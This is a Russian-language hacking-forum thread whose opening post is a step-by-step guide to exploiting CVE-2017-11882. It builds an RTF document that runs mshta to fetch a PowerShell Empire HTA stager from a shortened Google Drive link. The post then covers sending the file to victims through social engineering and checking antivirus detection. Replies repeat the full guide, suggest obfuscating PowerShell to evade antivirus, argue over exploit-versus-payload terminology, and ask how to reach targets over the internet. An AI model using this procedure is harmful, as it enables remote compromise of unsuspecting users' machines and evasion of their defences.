• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья CVE-2017-11882 или Взлом с помощью безобидного документа

OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Всем привет. Сегодня хочу показать Вам новый эксплоит, с помощью которого мы получим доступ к целевой машине.

Коротко и по делу:

Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.

Поехали!

Источник :

Установка :

Код:
git clone https://github.com/Ridter/CVE-2017-11882
cd CVE-2017-11882
chmod +x Command109b_CVE-2017-11882.py
chmod +x Command43b_CVE-2017-11882.py
На этом все.

Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework

Источник :

Гайд по использованию Empire от DarkNode: https://codeby.net/threads/znakomstvo-s-powershell-empire-framework.58469/
Гайд по HTA что такое и с чем едят : https://codeby.net/threads/malvar-na-html-ili-hta-dlja-xakera.61136/

Собственно говоря, поехали :

Listeners у меня уже есть, что бы их создать, проделаем :
listeners
uselistener http

Далее заполняем нужные поля с помощью set
Пример : set Name http - задать имя листенера http
set Host ip - пишем айпишник куда стучаться вистиму
set Port номер порта - пишем на какой порт стукать
execute - выполнить, создать

Далее у вас появится листенер. Можно вернутся в главное меню с помощью : main

CVE-2017-11882 или Взлом с помощью безобидного документа


Создание HTA

CVE-2017-11882 или Взлом с помощью безобидного документа


usestager windows/hta - использовать модуль
info - посмотреть инфу и обычно заполнить Listener
set Listener http (у меня так называется листенер "http")
set OutFile /tmp/hack1.hta - путь к сохранению файла и название
execute - генерим и получаем на выходе

CVE-2017-11882 или Взлом с помощью безобидного документа


Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.

CVE-2017-11882 или Взлом с помощью безобидного документа


Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :

CVE-2017-11882 или Взлом с помощью безобидного документа


CVE-2017-11882 или Взлом с помощью безобидного документа


Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:

CVE-2017-11882 или Взлом с помощью безобидного документа


Копируем это батву, идем в каталог где мы установили софт. У меня это :
Код:
cd CVE-2017-11882
Здесь исполняем следующее :
Код:
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf
CVE-2017-11882 или Взлом с помощью безобидного документа


Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

CVE-2017-11882 или Взлом с помощью безобидного документа


YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)

Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.

Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.

Результат на nodistribute:

По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Статью пишу первый раз, не судите строго =) Всем профит!
 

Вложения

A

adm2

Well-known member
05.07.2017
50
117
О, только думаю "забавная CVE нада разобрать", а тут статейка)
AV вообще не палит если строку павершелла сформировать из цикла статей
powershell for hackers от Даркнода)
 
tumm

tumm

Member
10.10.2017
20
8
Палится только неслабо
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
HTA палитсья давно всем чем можно. Рекомендую криптовать ps или другими языками
 
  • Нравится
Реакции: sk3l
PingVinich

PingVinich

Технарь
Red Team
19.03.2017
138
457
Всем привет. Сегодня хочу показать Вам новый эксплоит, с помощью которого мы получим доступ к целевой машине. Коротко и по делу:
Коротко по делу. Создаем файл в формате RTF с вызовом функции командной строки mshta , которая позволит вызвать powershell с помощью HTA файла, расположенного на удаленном сервере.
Поехали!
Источник :
Установка :
1. git clone
2. cd CVE-2017-11882
3. chmod +x Command109b_CVE-2017-11882.py
4. chmod +x Command43b_CVE-2017-11882.py

На этом все. Теперь создадим HTA файл с помощью [Empire] Post-Exploitation Framework
Источник :
Гайд по использованию Empire от DarkNode: https://codeby.net/threads/znakomstvo-s-powershell-empire-framework.58469/
Гайд по HTA что такое и с чем едят : https://codeby.net/threads/malvar-na-html-ili-hta-dlja-xakera.61136/

Собственно говоря, поехали :
Listeners у меня уже есть, что бы их создать, проделаем :
listeners
uselistener http

Далее заполняем нужные поля с помощью set
Пример : set Name http - задать имя листенера http
set Host ip - пишем айпишник куда стучаться вистиму
set Port номер порта - пишем на какой порт стукать
execute - выполнить, создать

Далее у вас появится листенер. Можно вернутся в главное меню с помощью : main
Посмотреть вложение 13156

Создание HTA
Посмотреть вложение 13145

usestager windows/hta - использовать модуль
info - посмотреть инфу и обычно заполнить Listener
set Listener http (у меня так называется листенер "http")
set OutFile /tmp/hack1.hta - путь к сохранению файла и название
execute - генерим и получаем на выходе
Посмотреть вложение 13146


Далее идем в папочку /tmp берем этот файлик и заливаем на любой файлообменник. К примеру Google Drive.
Посмотреть вложение 13147

Далее включаем доступ на скачивание всем у кого есть ссылка. Копируем ссылку и переходим по ней :
Посмотреть вложение 13148


Посмотреть вложение 13150


Здесь копируем ссылку на скачивание файла и идем к любому сервису по сокращению ссылок. Я предпочел гугловский:
Посмотреть вложение 13151


Копируем это батву, идем в каталог где мы установили софт. У меня это :
cd CVE-2017-11882
Здесь исполняем следующее :
python Command109b_CVE-2017-11882.py -c "mshta сюда вставить сокращенную ссылку" -o codeby.rtf

Посмотреть вложение 13152


Файл создан в формате rft. Почему так, объясню в конце статьи. Далее отправляем потенциальному клиенту.. ) Уж тут кто что придумает, в помощь СИ) И после запуска файла видим следующую картину )

Посмотреть вложение 13155

YEAAH! PROF1t! Теперь на машине, которая запустила файл в процессах появится наш родимый и неповторимый PowerShell, а значит Мы в системе, тому свидетельствуем подключение агента в империи ) Далее делаем чего душе угодно. В Империи куча фичей прикольных, в том числе и трольских)

Дополнительная информация : Почему RTF? Почему не DOC? Дело в том, что я часа 2 убил на то, что бы тестировать файлы док. Тестируемая машина вин 10 с 16тым офисом, запускал и ничего не происходило. Долго не мог понять что такое, да и забил. Создал в ртф и просто супер. Никаких проблем. Запускается файл, далее вылазит обычное окошко " разрешить редактирование файла " это никакое не предупреждение безопасности как в макросах, это банальщина и ничего в себе таинственного она не несет. После разрешения редактирования мигает окошко ПоверШелл и все, система завоевана.

Как обстоят дела с обнаружением ? Тут дело такое, первый раз когда создал, видел только Касперыч. Буквально через несколько часов еще парочка. И того 3, из них самый распространенный Касперский.

Результат на nodistribute:


По мне так очень даже хорошие показатели. Способ довольно простой, не требует особых хацких навыков. Статью пишу первый раз, не судите строго =) Всем профит!
Я как раз писал статью, о вредоносных HTA-файлах. Это один из прикладных способов их использования.
 
tumm

tumm

Member
10.10.2017
20
8
Причем тут хта,палится сам код эксплойта
 
tumm

tumm

Member
10.10.2017
20
8
Причем тут код эксплоита палится нагрузка а не эксплоит. Сам по себе эксплоит это херня.
Во первых-АВ проверка выдает палево на сигнатуру именно эксплойта,это можно увидеть на результате АВ проверки
Exploit.CVE-2017-11882.Gen

В вторых пайлоад стандартный калькулятор у винды =)

P.S. Подтирать мессаги несерьезно )
 
Последнее редактирование:
  • Нравится
Реакции: xkurs0v0d и Hackaton192
H

Hackaton192

Во первых-АВ проверка выдает палево на сигнатуру именно эксплойта,это можно увидеть на результате АВ проверки
Exploit.CVE-2017-11882.Gen

В вторых пайлоад стандартный калькулятор у винды =)

P.S. Подтирать мессаги несерьезно )

Согласен палится по сигнатуре!!До подгрузки payloada
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Итак, призываю все группы оценивать статью с помощью систем репутации, "Мне нравится" или комментариев.
Отныне, просто состоять в группе мало для того, чтобы в ней оставаться. Ваша задача, так же наставлять авторов и оценивать их.
Критерии:
Статья достойна репутации +1 балл
Статья отстой и/или не соблюдены правила -1 балл
Статья неплохая, но на репу не катит - поставить лайк - оставить комментарий.
Статья нейтральная не гавно но и не шедевр - оставить комментарий.

Grey
@a113
@AL04E
@Celestial
@d7uk4r3v
@DoberGroup
@ghost
@Ishikawa
@JuicyBrute
@koldonuuchu
@MAdDog719
@nemainthium
@Underwood
@Vertigo
@WIPE
Red
@Dr.Jo.Frink
@Dr.Lafa
@grapf92
@id2746
@IioS
@Ondrik8
@r1991omen
@Sniff
@z3RoTooL
Eleet
@ghostphisher
@kot-gor
@PingVinich
@SooLFaa
@Vander
@~~DarkNode~~
 
  • Нравится
Реакции: Bobos
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 514
3 353
Темы такого рода всегда зачет. Преподнес шикарно - картинки, текст, ссылки. Ставлю мне нравится с пожеланиями потому что:
- упустил момент проверить на разных системах и выяснить где палится где не палится.Я вообще за то, если ТС увзял такую тему ( подобную ) стоит заморочить полной проверкой не одной своей стационарке, а как минимум поднять пару виртуалок с разными версиями ОС и АВ. Все мы понимаем - у компаний АВ производящих есть свои каналы "новостей" и такие темы не открывают им с эффектом ВАУ глаза, а для сохранения личного времени читателя вполне пойдет. ТС - продолжай :)
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Темы такого рода всегда зачет. Преподнес шикарно - картинки, текст, ссылки. Ставлю мне нравится с пожеланиями потому что:
- упустил момент проверить на разных системах и выяснить где палится где не палится.Я вообще за то, если ТС увзял такую тему ( подобную ) стоит заморочить полной проверкой не одной своей стационарке, а как минимум поднять пару виртуалок с разными версиями ОС и АВ. Все мы понимаем - у компаний АВ производящих есть свои каналы "новостей" и такие темы не открывают им с эффектом ВАУ глаза, а для сохранения личного времени читателя вполне пойдет. ТС - продолжай :)
Спасибо, учту!:)
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Во первых-АВ проверка выдает палево на сигнатуру именно эксплойта,это можно увидеть на результате АВ проверки
Exploit.CVE-2017-11882.Gen

В вторых пайлоад стандартный калькулятор у винды =)

P.S. Подтирать мессаги несерьезно )
Во - первых я не подтирал ни одного поста и посты не удаляются а скрываются из под юзеров(по крайней мере удалять перманенто модеры не могут). А во - вторых резберись наконец в терминологии, что есть эксплоит, а что есть пэйлоад.
В данном случае вся цвешка выступает как НАГРУЗКА. Эксплоит - это код, который эксплуатирует утечку в памяти если это бинарщина, если под веб свою специфику (типа крутилки скули) и так далее. Он не является вредоносной программой, доставка ворда и сигнатуры ворда это уже НАГРУЗКА т.е. payload. Сам эксплоит не может быть нагрузкой.
 
tumm

tumm

Member
10.10.2017
20
8
Во - первых я не подтирал ни одного поста и посты не удаляются а скрываются из под юзеров(по крайней мере удалять перманенто модеры не могут). А во - вторых резберись наконец в терминологии, что есть эксплоит, а что есть пэйлоад.
В данном случае вся цвешка выступает как НАГРУЗКА. Эксплоит - это код, который эксплуатирует утечку в памяти если это бинарщина, если под веб свою специфику (типа крутилки скули) и так далее. Он не является вредоносной программой, доставка ворда и сигнатуры ворда это уже НАГРУЗКА т.е. payload. Сам эксплоит не может быть нагрузкой.
Подтирала администрация.Сам головой подумай и разберись что такое пэйлоад а что эксп)Ппц тру хакиры с кодебу немогут отличить пэйлоад от экспа.
 
Последнее редактирование:
tumm

tumm

Member
10.10.2017
20
8
Была удалена лексика, недопустимая на codeby. Как в Вашем случае ...
Что именно?Матом не ругался,если человек тупит он хоть админ хоть нет,бред какой -то.С таким отношением-"Админстрация избранная,а все остальные идиоты" вы далеко не уедите.
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Давайте вы продолжите мерится знаниями не под моей темой. Как я понимаю, здесь уже перешли на личное, это не касается моей темы. Для этого есть ТГ лс. Спасибо)
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Подтирала администрация.Сам головой подумай и разберись что такое пэйлоад а что эксп)Ппц тру хакиры с кодебу немогут отличить пэйлоад от экспа.
Беда. Причем тут регалии и прочее? Глупые люди думают, что я спорю потому что чувствую силу, что я модератор. На самом деле я никак не оперировал своим статусом на этом форуме. Я в шоке от непонимания что такое эксплоит, а что такое нагрузка. В чем разница между шеллкодом и эксплоитом?! Очень рекомендую книгу "Хакинг: Искусство сплоитинга" - в идеале читать в оригинале, чтобы потом не бегать по форумам и не учить людей в чем не разбираешься.
 
Последнее редактирование:
A

adm2

Well-known member
05.07.2017
50
117
Если что вот книга)
 
M

motioncro

Всем привет,
Возможно, мой вопрос покажется немного необдуманным, но все же прошу Вашей помощи!
Почему то не определяет агента, на принимающей машине загружается скрипт, в процессах есть powerShell, а на хосте нет агента?
Инструкция написана для локальной сети, а как быть с внешней? Для меня, как хоста, нужен статический ip, верно?
Спасибо огромное
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб